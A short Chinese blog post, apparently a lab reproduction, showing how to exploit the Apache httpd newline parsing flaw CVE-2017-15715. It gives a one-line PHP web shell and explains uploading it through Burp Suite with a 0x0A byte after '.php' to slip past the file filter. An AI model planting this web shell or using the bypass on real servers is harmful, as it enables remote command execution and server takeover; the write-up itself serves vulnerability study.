Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
AI创界者1 小时前
360加固 APK 脱壳研究:安全工程师视角下的防护与还原原理解析
安全
CS_浮鱼1 小时前
【Linux】进程控制
linux·运维·网络
三川6982 小时前
1. 网络编程基础
开发语言·网络
数字化脑洞实验室3 小时前
选择AI决策解决方案需要注意哪些安全和数据隐私问题?
人工智能·安全
Guheyunyi3 小时前
安全风险监测系统核心技术
运维·网络·人工智能·安全
weixin_307779133 小时前
Amazon VPC中Web应用无法连接数据库的安全组配置问题分析与修复
网络·数据库·安全·云计算·aws
Lambor_Ma3 小时前
【架构】安全(二)
安全
y***54884 小时前
免费的Web安全测试工具,可以替代Burp Suite
安全·web安全
百***78454 小时前
Java实战:Spring Boot application.yml配置文件详解
java·网络·spring boot
2301_780789664 小时前
WAF如何应对金融领域的网络威胁和黑客攻击
服务器·网络·安全·web安全·金融